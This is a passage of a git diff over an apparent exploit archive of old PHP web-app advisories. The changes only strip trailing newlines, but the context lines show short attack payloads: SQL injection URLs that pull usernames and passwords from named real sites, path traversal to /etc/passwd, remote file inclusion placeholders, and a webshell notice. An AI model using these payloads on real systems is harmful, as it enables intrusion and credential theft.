100755 --- a/platforms/php/webapps/9463.php +++ b/platforms/php/webapps/9463.php @@ -132,4 +132,4 @@ /* jdc 2009 */ -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9464.txt b/platforms/php/webapps/9464.txt index 7e2dde9b2..51668b713 100755 --- a/platforms/php/webapps/9464.txt +++ b/platforms/php/webapps/9464.txt @@ -38,4 +38,4 @@ [»] [»] [»]==========================================================================================================================[»] -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9465.txt b/platforms/php/webapps/9465.txt index 6828a4a12..fe8c9a030 100755 --- a/platforms/php/webapps/9465.txt +++ b/platforms/php/webapps/9465.txt @@ -39,4 +39,4 @@ Please visit: http://unkn0wn.ws/board/index.php http://kumi.awardspace.com/diary/index.php?archive=5&year=2008+and+1=1 TRUE http://kumi.awardspace.com/diary/index.php?archive=5&year=2008+and+1=2 FALSE -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9469.txt b/platforms/php/webapps/9469.txt index 6dac9ed19..aa37d9cd7 100755 --- a/platforms/php/webapps/9469.txt +++ b/platforms/php/webapps/9469.txt @@ -36,4 +36,4 @@ http://www.deals2cops.com | And All Friends!!!! | +========================================================+ -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9470.txt b/platforms/php/webapps/9470.txt index c3530603d..3a2b28757 100755 --- a/platforms/php/webapps/9470.txt +++ b/platforms/php/webapps/9470.txt @@ -31,4 +31,4 @@ Sniper.vb , Mr.Nrfzh,and all friends Bay Bay -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9471.txt b/platforms/php/webapps/9471.txt index eb0f733b1..718a0152a 100755 --- a/platforms/php/webapps/9471.txt +++ b/platforms/php/webapps/9471.txt @@ -39,4 +39,4 @@ Greetz : -:- SkyCreW -:- (o)===========================================================================================(o) -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9472.txt b/platforms/php/webapps/9472.txt index 4ee197501..6539a399a 100755 --- a/platforms/php/webapps/9472.txt +++ b/platforms/php/webapps/9472.txt @@ -44,4 +44,4 @@ Greetz : Reno ; Dr.php ; !BaD BoY! ; 5D ; taishi ; ga3 wlad drb XD ; all friends [* -] -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9474.rb b/platforms/php/webapps/9474.rb index 249da08bf..919c2c31b 100755 --- a/platforms/php/webapps/9474.rb +++ b/platforms/php/webapps/9474.rb @@ -94,4 +94,4 @@ rescue puts "Could not fetch data. magic_quotes_gpc probably is ON." end -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9475.txt b/platforms/php/webapps/9475.txt index 406d63a59..14a9935a7 100755 --- a/platforms/php/webapps/9475.txt +++ b/platforms/php/webapps/9475.txt @@ -12,4 +12,4 @@ http://daralyamama.com/news/admin/admin_backup.php Special Thanks : all sec-war.com members -# milw0rm.com [2009-08-18] +# milw0rm.com [2009-08-18] \ No newline at end of file diff --git a/platforms/php/webapps/9481.txt b/platforms/php/webapps/9481.txt index e4872821a..0560651ca 100755 --- a/platforms/php/webapps/9481.txt +++ b/platforms/php/webapps/9481.txt @@ -24,4 +24,4 @@ demo: http://www.moagallery.net/demo/index.php?action=gallery_view&gallery_id=-0000000609+union+select+concat%28name,char%2858%29,password%29+from+moa_users-- -# milw0rm.com [2009-08-24] +# milw0rm.com [2009-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/9482.txt b/platforms/php/webapps/9482.txt index bf77eb6bc..34b270f7b 100755 --- a/platforms/php/webapps/9482.txt +++ b/platforms/php/webapps/9482.txt @@ -23,4 +23,4 @@ demo: http://www.arcadetradescript.com/demo/admin/ -------- -# milw0rm.com [2009-08-24] +# milw0rm.com [2009-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/9484.txt b/platforms/php/webapps/9484.txt index 794d7af0b..37430ec90 100755 --- a/platforms/php/webapps/9484.txt +++ b/platforms/php/webapps/9484.txt @@ -42,4 +42,4 @@ demo: http://demo.phpdirsubmit.com -------- -# milw0rm.com [2009-08-24] +# milw0rm.com [2009-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/9485.txt b/platforms/php/webapps/9485.txt index b2c44a044..aeb5f7812 100755 --- a/platforms/php/webapps/9485.txt +++ b/platforms/php/webapps/9485.txt @@ -9,4 +9,4 @@ proper credentials. Hever Costa Rocha -# milw0rm.com [2009-08-24] +# milw0rm.com [2009-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/9490.txt b/platforms/php/webapps/9490.txt index c78f99d86..eb865e753 100755 --- a/platforms/php/webapps/9490.txt +++ b/platforms/php/webapps/9490.txt @@ -23,4 +23,4 @@ # # ###################################### TNX GOD ###################################### -# milw0rm.com [2009-08-24] +# milw0rm.com [2009-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/9493.txt b/platforms/php/webapps/9493.txt index 3bf2dce88..9d1ce0acd 100755 --- a/platforms/php/webapps/9493.txt +++ b/platforms/php/webapps/9493.txt @@ -17,4 +17,4 @@ [+]LOGIN ; http://[Target]/[path]/admin/login.php ################################################## -# milw0rm.com [2009-08-24] +# milw0rm.com [2009-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/9494.txt b/platforms/php/webapps/9494.txt index c4fba9300..e7a5851c7 100755 --- a/platforms/php/webapps/9494.txt +++ b/platforms/php/webapps/9494.txt @@ -23,4 +23,4 @@ ()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()() -# milw0rm.com [2009-08-24] +# milw0rm.com [2009-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/9497.pl b/platforms/php/webapps/9497.pl index 20846d653..7724459fd 100755 --- a/platforms/php/webapps/9497.pl +++ b/platforms/php/webapps/9497.pl @@ -115,4 +115,4 @@ return 0; # http://www.Target.com/shop.php?id=1 << and 1=0 ############################################################## -# milw0rm.com [2009-08-24] +# milw0rm.com [2009-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/9499.txt b/platforms/php/webapps/9499.txt index 54a13b3ce..5a6e0f718 100755 --- a/platforms/php/webapps/9499.txt +++ b/platforms/php/webapps/9499.txt @@ -12,4 +12,4 @@ Panel: /admin/ ################## Thanks: milw0rm-->Str0ke -# milw0rm.com [2009-08-24] +# milw0rm.com [2009-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/9502.txt b/platforms/php/webapps/9502.txt index 7f3046b4e..994e16349 100755 --- a/platforms/php/webapps/9502.txt +++ b/platforms/php/webapps/9502.txt @@ -39,4 +39,4 @@ http://www.ninjaforge.com/index.php?option=com_ninjamonials&task=display&testimI [!] Produced in South America --------------------------------- -# milw0rm.com [2009-08-24] +# milw0rm.com [2009-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/9504.txt b/platforms/php/webapps/9504.txt index c2942cebe..262e04573 100755 --- a/platforms/php/webapps/9504.txt +++ b/platforms/php/webapps/9504.txt @@ -39,4 +39,4 @@ etc, etc.... tested: 1.0.7 / 1.0.9 -# milw0rm.com [2009-08-24] +# milw0rm.com [2009-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/9505.txt b/platforms/php/webapps/9505.txt index 0ff6b796c..9c2ae4b3a 100755 --- a/platforms/php/webapps/9505.txt +++ b/platforms/php/webapps/9505.txt @@ -59,4 +59,4 @@ Potential Abuse - Upload your files to the new directory - Host your sound,movie,pictures, or zipped archives for FREE! -# milw0rm.com [2009-08-24] +# milw0rm.com [2009-08-24] \ No newline at end of file diff --git a/platforms/php/webapps/9510.txt b/platforms/php/webapps/9510.txt index 1e7ad03e2..b237352a4 100755 --- a/platforms/php/webapps/9510.txt +++ b/platforms/php/webapps/9510.txt @@ -43,4 +43,4 @@ YOGYACARDERLINK : leQhi,lingah,-Jali,Anak_Naga_,g0nz,IdioT_InsidE, g0t inspiration in my bedroom when i was flashback my mind about jogja & jovita PROUD TO BE INDONESIAN- -# milw0rm.com [2009-08-25] +# milw0rm.com [2009-08-25] \ No newline at end of file diff --git a/platforms/php/webapps/9511.txt b/platforms/php/webapps/9511.txt index 9fb8890bf..c465dbbe7 100755 --- a/platforms/php/webapps/9511.txt +++ b/platforms/php/webapps/9511.txt @@ -35,4 +35,4 @@ Author: Red-D3v1L <- ########################################################################### -# milw0rm.com [2009-08-25] +# milw0rm.com [2009-08-25] \ No newline at end of file diff --git a/platforms/php/webapps/9512.txt b/platforms/php/webapps/9512.txt index 77674a690..fffa01d95 100755 --- a/platforms/php/webapps/9512.txt +++ b/platforms/php/webapps/9512.txt @@ -25,4 +25,4 @@ # Securitylab Security Research Team ################################################################### -# milw0rm.com [2009-08-25] +# milw0rm.com [2009-08-25] \ No newline at end of file diff --git a/platforms/php/webapps/9518.txt b/platforms/php/webapps/9518.txt index 299a0ecd0..1560b063b 100755 --- a/platforms/php/webapps/9518.txt +++ b/platforms/php/webapps/9518.txt @@ -35,4 +35,4 @@ ######################################################################################################### ######################################################################################################### -# milw0rm.com [2009-08-25] +# milw0rm.com [2009-08-25] \ No newline at end of file diff --git a/platforms/php/webapps/9522.txt b/platforms/php/webapps/9522.txt index 9ad0d83f9..490579e38 100755 --- a/platforms/php/webapps/9522.txt +++ b/platforms/php/webapps/9522.txt @@ -52,4 +52,4 @@ http://localhost/[path]/sources/page_sitemap.php?MOA_PATH=[AvriLhea] %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ -# milw0rm.com [2009-08-26] +# milw0rm.com [2009-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/9523.txt b/platforms/php/webapps/9523.txt index 7af5a3d38..8cbcfe929 100755 --- a/platforms/php/webapps/9523.txt +++ b/platforms/php/webapps/9523.txt @@ -35,4 +35,4 @@ ######################################################################################################### ######################################################################################################### -# milw0rm.com [2009-08-26] +# milw0rm.com [2009-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/9524.txt b/platforms/php/webapps/9524.txt index c1ddb1281..9de02aae3 100755 --- a/platforms/php/webapps/9524.txt +++ b/platforms/php/webapps/9524.txt @@ -42,4 +42,4 @@ Please visit: http://unkn0wn.ws/board/index.php http://www.sweetphp.com/projects/TotalCalendar_2/box_display.php?box=../../../../../../../../etc/passwd%00.htm -# milw0rm.com [2009-08-26] +# milw0rm.com [2009-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/9525.txt b/platforms/php/webapps/9525.txt index 3fea86d34..0df78e28a 100755 --- a/platforms/php/webapps/9525.txt +++ b/platforms/php/webapps/9525.txt @@ -12,4 +12,4 @@ Code In sources\_template_parser.php POC /sources/_template_parser.php?p_filename=../../../../../../../../../../../../../../../etc/passwd -# milw0rm.com [2009-08-26] +# milw0rm.com [2009-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/9527.txt b/platforms/php/webapps/9527.txt index 4c39d1b33..4c5200eb3 100755 --- a/platforms/php/webapps/9527.txt +++ b/platforms/php/webapps/9527.txt @@ -37,4 +37,4 @@ Author: Red-D3v1L <- ########################################################################### -# milw0rm.com [2009-08-26] +# milw0rm.com [2009-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/9529.txt b/platforms/php/webapps/9529.txt index b51314bce..339c645db 100755 --- a/platforms/php/webapps/9529.txt +++ b/platforms/php/webapps/9529.txt @@ -40,4 +40,4 @@ Vendor : http://www.discuz.com \--------------------------------------------------------------------------------------------------------------/ -# milw0rm.com [2009-08-26] +# milw0rm.com [2009-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/9530.txt b/platforms/php/webapps/9530.txt index 889573d82..7e53cc491 100755 --- a/platforms/php/webapps/9530.txt +++ b/platforms/php/webapps/9530.txt @@ -271,4 +271,4 @@ The freshest blend of IT security news is available for your daily consumption a ---------------------------------------------------------------------------------------------- The contents of this advisory are copyright (c) 2009 MorningStar Security, and may be distributed freely provided that and proper credit is given. -# milw0rm.com [2009-08-26] +# milw0rm.com [2009-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/9531.txt b/platforms/php/webapps/9531.txt index df9df487c..11c745c25 100755 --- a/platforms/php/webapps/9531.txt +++ b/platforms/php/webapps/9531.txt @@ -41,4 +41,4 @@ ######################################################################################################### ######################################################################################################### -# milw0rm.com [2009-08-26] +# milw0rm.com [2009-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/9532.txt b/platforms/php/webapps/9532.txt index d636f751b..c8f058866 100755 --- a/platforms/php/webapps/9532.txt +++ b/platforms/php/webapps/9532.txt @@ -37,4 +37,4 @@ http://www.leeen.net/index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT use | And All Friends!!!! +========================================================+ -# milw0rm.com [2009-08-26] +# milw0rm.com [2009-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/9533.txt b/platforms/php/webapps/9533.txt index af7e1ca02..007c2ae0b 100755 --- a/platforms/php/webapps/9533.txt +++ b/platforms/php/webapps/9533.txt @@ -35,4 +35,4 @@ http://localhost/path/save.php?file_save= (Shell Code) Tüm İslam Aleminin Ramazan-ı Åžerifleri Hayırlı ve Mubarek Olsun. ----------------------------------------------------------------------------------- -# milw0rm.com [2009-08-26] +# milw0rm.com [2009-08-26] \ No newline at end of file diff --git a/platforms/php/webapps/9534.txt b/platforms/php/webapps/9534.txt index 16478befc..cb23bc93b 100755 --- a/platforms/php/webapps/9534.txt +++ b/platforms/php/webapps/9534.txt @@ -43,4 +43,4 @@ Others => g0par Santiago,Don Tukulesto,yadoy666,mixbrainwasher letz we hack they sites & servers !! PROUD TO BE INDONESIAN !! * 04:30am in my bedroom, Inspirated by Yogyakarta & jovita (i really mizz you) -# milw0rm.com [2009-08-27] +# milw0rm.com [2009-08-27] \ No newline at end of file diff --git a/platforms/php/webapps/9535.txt b/platforms/php/webapps/9535.txt index 6675d01ff..47b2bf6b9 100755 --- a/platforms/php/webapps/9535.txt +++ b/platforms/php/webapps/9535.txt @@ -35,4 +35,4 @@ GET THE INFO IN THE CALENDAR : ) ######################################################################################################### ######################################################################################################### -# milw0rm.com [2009-08-27] +# milw0rm.com [2009-08-27] \ No newline at end of file diff --git a/platforms/php/webapps/9538.txt b/platforms/php/webapps/9538.txt index 7c554e235..cb4a744a7 100755 --- a/platforms/php/webapps/9538.txt +++ b/platforms/php/webapps/9538.txt @@ -37,4 +37,4 @@ Download :: http://snowhall.com/downloads/silurus.php ######################################################################################################### ######################################################################################################### -# milw0rm.com [2009-08-28] +# milw0rm.com [2009-08-28] \ No newline at end of file diff --git a/platforms/php/webapps/9544.txt b/platforms/php/webapps/9544.txt index 0182115d5..d2aa62fe7 100755 --- a/platforms/php/webapps/9544.txt +++ b/platforms/php/webapps/9544.txt @@ -33,4 +33,4 @@ Author: Red-D3v1L <- ########################################################################### -# milw0rm.com [2009-08-31] +# milw0rm.com [2009-08-31] \ No newline at end of file diff --git a/platforms/php/webapps/9552.txt b/platforms/php/webapps/9552.txt index 5ae735864..70fcddfdb 100755 --- a/platforms/php/webapps/9552.txt +++ b/platforms/php/webapps/9552.txt @@ -36,4 +36,4 @@ ######################################################################################################### ######################################################################################################### -# milw0rm.com [2009-08-31] +# milw0rm.com [2009-08-31] \ No newline at end of file diff --git a/platforms/php/webapps/9553.txt b/platforms/php/webapps/9553.txt index 67647d67a..0b4d5c297 100755 --- a/platforms/php/webapps/9553.txt +++ b/platforms/php/webapps/9553.txt @@ -48,4 +48,4 @@ # # ################################################################# -# milw0rm.com [2009-08-31] +# milw0rm.com [2009-08-31] \ No newline at end of file diff --git a/platforms/php/webapps/9555.txt b/platforms/php/webapps/9555.txt index 914f60d9c..fa9cf246c 100755 --- a/platforms/php/webapps/9555.txt +++ b/platforms/php/webapps/9555.txt @@ -36,4 +36,4 @@ Greetz.: ~ JiKo ~ The Sad Hacker ~ All No-Exploit.com Members ------------------------------------------------------------- -# milw0rm.com [2009-08-31] +# milw0rm.com [2009-08-31] \ No newline at end of file diff --git a/platforms/php/webapps/9556.php b/platforms/php/webapps/9556.php index c94d484ee..59d915a04 100755 --- a/platforms/php/webapps/9556.php +++ b/platforms/php/webapps/9556.php @@ -34,4 +34,4 @@ fputs($fd,$message); echo ("[+]Go to see U webshell : $host/fly.php"); ?> -# milw0rm.com [2009-08-31] +# milw0rm.com [2009-08-31] \ No newline at end of file diff --git a/platforms/php/webapps/9563.txt b/platforms/php/webapps/9563.txt index 34ec995ec..bdee72e4b 100755 --- a/platforms/php/webapps/9563.txt +++ b/platforms/php/webapps/9563.txt @@ -46,4 +46,4 @@ _________________________________________________________________ # ######################################################################################################### -# milw0rm.com [2009-09-01] +# milw0rm.com [2009-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/9564.txt b/platforms/php/webapps/9564.txt index 80c0e9cd3..eb0c1fe87 100755 --- a/platforms/php/webapps/9564.txt +++ b/platforms/php/webapps/9564.txt @@ -45,4 +45,4 @@ @~~=ByALBAYX :/ -# milw0rm.com [2009-09-01] +# milw0rm.com [2009-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/9565.txt b/platforms/php/webapps/9565.txt index 4f1714317..2ea8a934f 100755 --- a/platforms/php/webapps/9565.txt +++ b/platforms/php/webapps/9565.txt @@ -47,4 +47,4 @@ Please visit: http://unkn0wn.ws/board/index.php Note: have somes other xss, tired to do all ^^ -# milw0rm.com [2009-09-01] +# milw0rm.com [2009-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/9566.txt b/platforms/php/webapps/9566.txt index 2be53d441..19bf3c290 100755 --- a/platforms/php/webapps/9566.txt +++ b/platforms/php/webapps/9566.txt @@ -20,4 +20,4 @@ BUG: <? require_once($CONFIG['AdminPath'] . "/include/engine/folder.php"); -# milw0rm.com [2009-09-01] +# milw0rm.com [2009-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/9569.txt b/platforms/php/webapps/9569.txt index 45528b39e..34dc3ab09 100755 --- a/platforms/php/webapps/9569.txt +++ b/platforms/php/webapps/9569.txt @@ -23,4 +23,4 @@ # -( by -SmoG- )- ########################################################################## -# milw0rm.com [2009-09-01] +# milw0rm.com [2009-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/9570.txt b/platforms/php/webapps/9570.txt index 1a96c767a..f127e32e0 100755 --- a/platforms/php/webapps/9570.txt +++ b/platforms/php/webapps/9570.txt @@ -21,4 +21,4 @@ Line 53: require("./../".$_GET["filename"]); ------------------------------------------------------------------------------------- -# milw0rm.com [2009-09-01] +# milw0rm.com [2009-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/9571.txt b/platforms/php/webapps/9571.txt index 0fb3060b2..f6daf8db1 100755 --- a/platforms/php/webapps/9571.txt +++ b/platforms/php/webapps/9571.txt @@ -52,4 +52,4 @@ Big Thanks => mywisdom [nice 0-day, you're 31337] letz we hack they sites & servers !! PROUD TO BE INDONESIAN !! * 02:55am dreaming alone about future & my old story in my bedroom -# milw0rm.com [2009-09-01] +# milw0rm.com [2009-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/9572.txt b/platforms/php/webapps/9572.txt index 258bc55ed..cb96b3cfa 100755 --- a/platforms/php/webapps/9572.txt +++ b/platforms/php/webapps/9572.txt @@ -25,4 +25,4 @@ DatalifeEngine 8.2 Remote File Inclusion Vulnerability ======================================================= <<->> All freinds , Zryan_kurd , RootSyS all member kurdish hackers team -# milw0rm.com [2009-09-01] +# milw0rm.com [2009-09-01] \ No newline at end of file diff --git a/platforms/php/webapps/9576.txt b/platforms/php/webapps/9576.txt index 62c0e7753..2e8ebfccb 100755 --- a/platforms/php/webapps/9576.txt +++ b/platforms/php/webapps/9576.txt @@ -38,4 +38,4 @@ d0rk : inurl:forummission.php \--------------------------------------------------------------------------------------------------------------/ -# milw0rm.com [2009-09-02] +# milw0rm.com [2009-09-02] \ No newline at end of file diff --git a/platforms/php/webapps/9577.txt b/platforms/php/webapps/9577.txt index f02c96985..bcb49db92 100755 --- a/platforms/php/webapps/9577.txt +++ b/platforms/php/webapps/9577.txt @@ -28,4 +28,4 @@ http://WwW.Sec-Code.CoM/vedit/editor/edit_htmlarea.php?highlighter=http://WwW.Se [!] bEST wISHES -# milw0rm.com [2009-09-02] +# milw0rm.com [2009-09-02] \ No newline at end of file diff --git a/platforms/php/webapps/9578.txt b/platforms/php/webapps/9578.txt index e023d0966..b34044869 100755 --- a/platforms/php/webapps/9578.txt +++ b/platforms/php/webapps/9578.txt @@ -58,4 +58,4 @@ Big Thanks => mywisdom [nice 0-day, you're 31337] letz we hack they sites & servers !! PROUD TO BE INDONESIAN !! * 11:20pm in my bedroom, preparing office goes on...!! -# milw0rm.com [2009-09-02] +# milw0rm.com [2009-09-02] \ No newline at end of file diff --git a/platforms/php/webapps/9582.txt b/platforms/php/webapps/9582.txt index 34644bb1a..a4d76bff9 100755 --- a/platforms/php/webapps/9582.txt +++ b/platforms/php/webapps/9582.txt @@ -49,4 +49,4 @@ http://localhost/[path]/modulistica/mdl_save.php?CLASSPATH=[AvriLhea] #[!] sekuritionline.net | manadocoding.net ###################################################################### -# milw0rm.com [2009-09-03] +# milw0rm.com [2009-09-03] \ No newline at end of file diff --git a/platforms/php/webapps/9583.txt b/platforms/php/webapps/9583.txt index 655e19683..f60c912f3 100755 --- a/platforms/php/webapps/9583.txt +++ b/platforms/php/webapps/9583.txt @@ -32,4 +32,4 @@ and many others #[!] sekuritionline.net | manadocoding.net ###################################################################### -# milw0rm.com [2009-09-03] +# milw0rm.com [2009-09-03] \ No newline at end of file diff --git a/platforms/php/webapps/9588.txt b/platforms/php/webapps/9588.txt index 541074b9f..cb7184602 100755 --- a/platforms/php/webapps/9588.txt +++ b/platforms/php/webapps/9588.txt @@ -79,4 +79,4 @@ note: <authorUrl>www.mikedeboer.nl</authorUrl> <version>2.0</version> -# milw0rm.com [2009-09-04] +# milw0rm.com [2009-09-04] \ No newline at end of file diff --git a/platforms/php/webapps/9590.c b/platforms/php/webapps/9590.c index d9bc60994..d286e947f 100755 --- a/platforms/php/webapps/9590.c +++ b/platforms/php/webapps/9590.c @@ -437,4 +437,4 @@ Usage(char *arg) exit(1); } -// milw0rm.com [2009-09-04] +// milw0rm.com [2009-09-04] \ No newline at end of file diff --git a/platforms/php/webapps/9591.txt b/platforms/php/webapps/9591.txt index f483cfc98..09b59519a 100755 --- a/platforms/php/webapps/9591.txt +++ b/platforms/php/webapps/9591.txt @@ -51,4 +51,4 @@ <<->> special greetz to ( tryag academy members ) -# milw0rm.com [2009-09-04] +# milw0rm.com [2009-09-04] \ No newline at end of file diff --git a/platforms/php/webapps/9593.txt b/platforms/php/webapps/9593.txt index 48d9620bc..3dc99ffac 100755 --- a/platforms/php/webapps/9593.txt +++ b/platforms/php/webapps/9593.txt @@ -47,4 +47,4 @@ _________________________________________________________________ # ######################################################################################################### -# milw0rm.com [2009-09-04] +# milw0rm.com [2009-09-04] \ No newline at end of file diff --git a/platforms/php/webapps/9599.txt b/platforms/php/webapps/9599.txt index b6a738a0c..9b843015e 100755 --- a/platforms/php/webapps/9599.txt +++ b/platforms/php/webapps/9599.txt @@ -27,4 +27,4 @@ # Securitylab Security Research Team ################################################################### -# milw0rm.com [2009-09-09] +# milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/9600.txt b/platforms/php/webapps/9600.txt index cc8aa32cc..1fcf977dd 100755 --- a/platforms/php/webapps/9600.txt +++ b/platforms/php/webapps/9600.txt @@ -32,4 +32,4 @@ TUHAN MEMBERKATI -# milw0rm.com [2009-09-09] +# milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/9601.php b/platforms/php/webapps/9601.php index ce10283b0..0afb9e433 100755 --- a/platforms/php/webapps/9601.php +++ b/platforms/php/webapps/9601.php @@ -39,4 +39,4 @@ } ?> -# milw0rm.com [2009-09-09] +# milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/9602.pl b/platforms/php/webapps/9602.pl index 9dd33899f..e409f4c65 100755 --- a/platforms/php/webapps/9602.pl +++ b/platforms/php/webapps/9602.pl @@ -140,4 +140,4 @@ sub get_content() { return $res->content; } -# milw0rm.com [2009-09-09] +# milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/9603.txt b/platforms/php/webapps/9603.txt index fea4e78b7..3ab254fbb 100755 --- a/platforms/php/webapps/9603.txt +++ b/platforms/php/webapps/9603.txt @@ -46,4 +46,4 @@ ARAB!AAN HAAACCKER !! [~] [~]-------------------------------------------------------------------------------- -# milw0rm.com [2009-09-09] +# milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/9604.txt b/platforms/php/webapps/9604.txt index aa2993c3e..90691707b 100755 --- a/platforms/php/webapps/9604.txt +++ b/platforms/php/webapps/9604.txt @@ -33,4 +33,4 @@ http://www.holiday-location.com/index.php?option=com_joomloc&controller=loc&view #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ -# milw0rm.com [2009-09-09] +# milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/9605.pl b/platforms/php/webapps/9605.pl index 2283b6c9f..5d6cb0f67 100755 --- a/platforms/php/webapps/9605.pl +++ b/platforms/php/webapps/9605.pl @@ -141,4 +141,4 @@ sub give_kt() { return $result; } -# milw0rm.com [2009-09-09] +# milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/9609.txt b/platforms/php/webapps/9609.txt index 1db7537ad..8b46f070f 100755 --- a/platforms/php/webapps/9609.txt +++ b/platforms/php/webapps/9609.txt @@ -49,4 +49,4 @@ Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!! Anggie Lestari Putri sulung dari keluarga bapak dodi dan ibu dini ^^ i lope yu pull... -# milw0rm.com [2009-09-09] +# milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/9611.txt b/platforms/php/webapps/9611.txt index dd6c67068..75612fb55 100755 --- a/platforms/php/webapps/9611.txt +++ b/platforms/php/webapps/9611.txt @@ -21,4 +21,4 @@ Line 28: include_once("lib/lang/".$conf['lang']."/menu.php"); ------------------------------------------------------------------------------------- -# milw0rm.com [2009-09-09] +# milw0rm.com [2009-09-09] \ No newline at end of file diff --git a/platforms/php/webapps/9623.txt b/platforms/php/webapps/9623.txt index f8c733a01..8a1d6f74c 100755 --- a/platforms/php/webapps/9623.txt +++ b/platforms/php/webapps/9623.txt @@ -36,4 +36,4 @@ <<->> All freinds , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team -# milw0rm.com [2009-09-10] +# milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/9625.txt b/platforms/php/webapps/9625.txt index 6fada5297..7dabb93d3 100755 --- a/platforms/php/webapps/9625.txt +++ b/platforms/php/webapps/9625.txt @@ -150,4 +150,4 @@ No fix. *************************************************** -# milw0rm.com [2009-09-10] +# milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/9629.txt b/platforms/php/webapps/9629.txt index 7cf95d5e3..a1c72dfae 100755 --- a/platforms/php/webapps/9629.txt +++ b/platforms/php/webapps/9629.txt @@ -7,4 +7,4 @@ To exploit this issue, it only suffices to access to the following URL. http://DOMAIN_TLD/GRAFFITI_CMS_INSTALL_DIR/__utility/Telligent_Editor/editor/filemanager/browser/default/browser.html?connector=../../connectors/aspx/connector.aspx -# milw0rm.com [2009-09-10] +# milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/9630.txt b/platforms/php/webapps/9630.txt index 0c4d525f4..7adf651ae 100755 --- a/platforms/php/webapps/9630.txt +++ b/platforms/php/webapps/9630.txt @@ -38,4 +38,4 @@ ######################################################################################################### ######################################################################################################### -# milw0rm.com [2009-09-10] +# milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/9631.txt b/platforms/php/webapps/9631.txt index 24b180e7e..9dbcaf877 100755 --- a/platforms/php/webapps/9631.txt +++ b/platforms/php/webapps/9631.txt @@ -35,4 +35,4 @@ ######################################################################################################### ######################################################################################################### -# milw0rm.com [2009-09-10] +# milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/9632.txt b/platforms/php/webapps/9632.txt index c2b285f09..64995d364 100755 --- a/platforms/php/webapps/9632.txt +++ b/platforms/php/webapps/9632.txt @@ -33,4 +33,4 @@ ######################## ######################## -# milw0rm.com [2009-09-10] +# milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/9633.txt b/platforms/php/webapps/9633.txt index fd8d29b42..c43e2cd31 100755 --- a/platforms/php/webapps/9633.txt +++ b/platforms/php/webapps/9633.txt @@ -36,4 +36,4 @@ ######################################################################################################### ######################################################################################################### -# milw0rm.com [2009-09-10] +# milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/9634.txt b/platforms/php/webapps/9634.txt index 944cdfcdf..2a7505224 100755 --- a/platforms/php/webapps/9634.txt +++ b/platforms/php/webapps/9634.txt @@ -41,4 +41,4 @@ ######################################################################################################### ####################################################################################### -# milw0rm.com [2009-09-10] +# milw0rm.com [2009-09-10] \ No newline at end of file diff --git a/platforms/php/webapps/9635.txt b/platforms/php/webapps/9635.txt index ae87a1452..d92e44dcb 100755 --- a/platforms/php/webapps/9635.txt +++ 